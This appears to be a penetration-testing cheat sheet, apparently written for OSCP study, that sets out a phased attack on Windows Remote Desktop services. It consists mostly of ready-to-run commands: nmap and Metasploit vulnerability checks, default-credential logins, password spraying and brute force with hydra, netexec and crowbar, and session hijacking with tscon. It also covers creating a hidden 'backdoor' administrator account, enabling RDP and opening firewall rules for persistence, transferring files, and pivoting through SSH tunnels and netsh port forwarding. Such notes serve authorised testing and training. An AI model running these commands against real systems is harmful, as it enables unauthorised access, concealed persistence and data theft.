Veilcat

Latest

3389 RDP

5 min read

Remote Desktop Protocol

Environment Variables / Setup

export IP=
export PORT=3389
export USER=administrator
export PASS=password
export DOMAIN=domain.local

Phase 1: RDP Service Discovery

Nmap RDP Scripts

nmap --script=rdp-* -p $PORT $IP

Service Detection

# Check RDP service
nmap -sV -p $PORT $IP

# Check for RDP security layers
nmap --script rdp-enum-encryption -p $PORT $IP

# Check for CVE-2019-0708 (BlueKeep)
nmap --script rdp-vuln-ms12-020 -p $PORT $IP

Phase 2: RDP Authentication Testing

Anonymous/Guest Access

# Test guest login
rdesktop -g 1024x768 -u guest -p "" $IP
xfreerdp /v:$IP /u:guest /p:"" /cert:ignore

# Test with null session
xfreerdp /v:$IP /u:"" /p:"" /cert:ignore

Default Credentials Testing

# Common RDP default credentials
xfreerdp /v:$IP /u:administrator /p:password /cert:ignore
xfreerdp /v:$IP /u:administrator /p:admin /cert:ignore
xfreerdp /v:$IP /u:administrator /p:"" /cert:ignore
xfreerdp /v:$IP /u:admin /p:admin /cert:ignore
xfreerdp /v:$IP /u:user /p:user /cert:ignore

# Domain authentication
xfreerdp /v:$IP /u:$DOMAIN\\$USER /p:$PASS /cert:ignore

Password Spraying

# Using hydra
hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -t 1 -V $IP rdp

# Using netexec
netexec rdp $IP -u users.txt -p 'Password123!' --continue-on-success

# Using crowbar
crowbar -b rdp -s $IP/32 -u users.txt -C passwords.txt

Phase 3: RDP Connection Methods

Standard RDP Connection

# Using xfreerdp (recommended)
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore /size:1024x768

# Using rdesktop
rdesktop -g 1024x768 -u $USER -p $PASS $IP

# With domain authentication
xfreerdp /v:$IP /d:$DOMAIN /u:$USER /p:$PASS /cert:ignore

Advanced Connection Options

# Enable clipboard sharing
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore +clipboard

# Enable drive redirection
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore /drive:share,/tmp

# Enable printer redirection
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore +printer

# Full screen mode
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore /f

Phase 4: RDP Security Assessment

Encryption and Security

# Check encryption level
nmap --script rdp-enum-encryption -p $PORT $IP

# Check for Network Level Authentication (NLA)
# NLA enabled = more secure, requires valid creds before connection
# NLA disabled = allows connection attempts without valid creds

Certificate Analysis

# Extract RDP certificate
nmap --script ssl-cert -p $PORT $IP

# Check certificate validity and information
openssl s_client -connect $IP:$PORT -starttls rdp 2>/dev/null | openssl x509 -noout -text

Phase 5: RDP Vulnerability Exploitation

BlueKeep (CVE-2019-0708)

# Check for BlueKeep vulnerability
nmap --script rdp-vuln-ms12-020 -p $PORT $IP
auxiliary/scanner/rdp/cve_2019_0708_bluekeep

# Only affects:
# Windows 7, Windows Server 2008 R2, Windows Server 2008
# Windows XP, Windows Server 2003

MS12-020 (CVE-2012-0002)

# Check for MS12-020 vulnerability
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

Note: Only use DoS exploits in controlled environments, not during OSCP exam

Phase 6: RDP Session Hijacking

Session Enumeration

# List active sessions (requires admin access)
query session
qwinsta

# Get detailed session info
query user

Session Hijacking (Requires SYSTEM)

# Hijack session (requires SYSTEM privileges)
tscon <session_id> /dest:<target_session>

# Example: Hijack session 2 to console
tscon 2 /dest:console

Phase 7: RDP Persistence & Post-Exploitation

Enable RDP (If Not Enabled)

# Enable RDP via registry
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Enable RDP via PowerShell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

# Add firewall exception
netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389

Create Backdoor User

# Add user with RDP privileges
net user backdoor Password123! /add
net localgroup "Remote Desktop Users" backdoor /add
net localgroup administrators backdoor /add

# Hide user from login screen (optional)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v backdoor /t REG_DWORD /d 0 /f

Phase 8: RDP File Transfer

File Transfer via RDP

# Enable drive redirection during connection
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore /drive:share,/tmp

# Files will be accessible at \\tsclient\share\ on Windows target
# Copy files from shared drive to target
copy \\tsclient\share\file.exe C:\temp\

Clipboard File Transfer

# Enable clipboard sharing
xfreerdp /v:$IP /u:$USER /p:$PASS /cert:ignore +clipboard

# Copy small files via clipboard (base64 encode for binaries)
base64 -w 0 file.exe | xclip -selection clipboard
# Paste in target, then decode

Phase 9: RDP Network Pivoting

RDP Tunneling

# Create SSH tunnel for RDP
ssh -L 3389:$TARGET_IP:3389 user@$PIVOT_IP

# Connect through tunnel
xfreerdp /v:localhost:3389 /u:$USER /p:$PASS /cert:ignore

Port Forwarding via RDP

# Once connected via RDP, use netsh for port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP

RDP Security Misconfigurations

Common Issues to Check

  1. Default credentials (administrator with weak passwords)
  2. Guest account enabled with RDP access
  3. No Network Level Authentication (NLA disabled)
  4. Weak encryption settings
  5. Overly permissive user groups in Remote Desktop Users
  6. RDP enabled on internal systems without proper access controls
  7. Outdated systems vulnerable to BlueKeep

RDP Attack Vectors

Authentication Attacks

  • Password spraying against known usernames
  • Credential stuffing with breached credentials
  • Default credential testing
  • Brute force attacks (use with caution - causes account lockouts)

Session-Based Attacks

  • Session hijacking (requires SYSTEM privileges)
  • Credential harvesting from memory
  • Pass-the-hash attacks via RDP

RDP Enumeration Checklist

  • Service discovery and version identification
  • Vulnerability scanning (BlueKeep, MS12-020)
  • Anonymous/guest access testing
  • Default credentials testing
  • Password spraying (careful with lockouts)
  • Certificate analysis
  • Encryption assessment
  • Session enumeration (if access gained)

Tools Summary

# Enumeration
nmap rdp scripts, rdesktop, xfreerdp

# Authentication attacks
hydra, crowbar, netexec

# Connection tools
xfreerdp (preferred), rdesktop

Common RDP Ports

3389/tcp  - RDP default
3390/tcp  - RDP alternate (sometimes used)

Next Steps

Once RDP access is gained:

  1. Enumerate local system for privilege escalation
  2. Harvest credentials from memory/registry
  3. Enable persistence mechanisms
  4. Pivot to internal network resources
  5. Extract sensitive data via GUI access

Resources

Graph View

Backlinks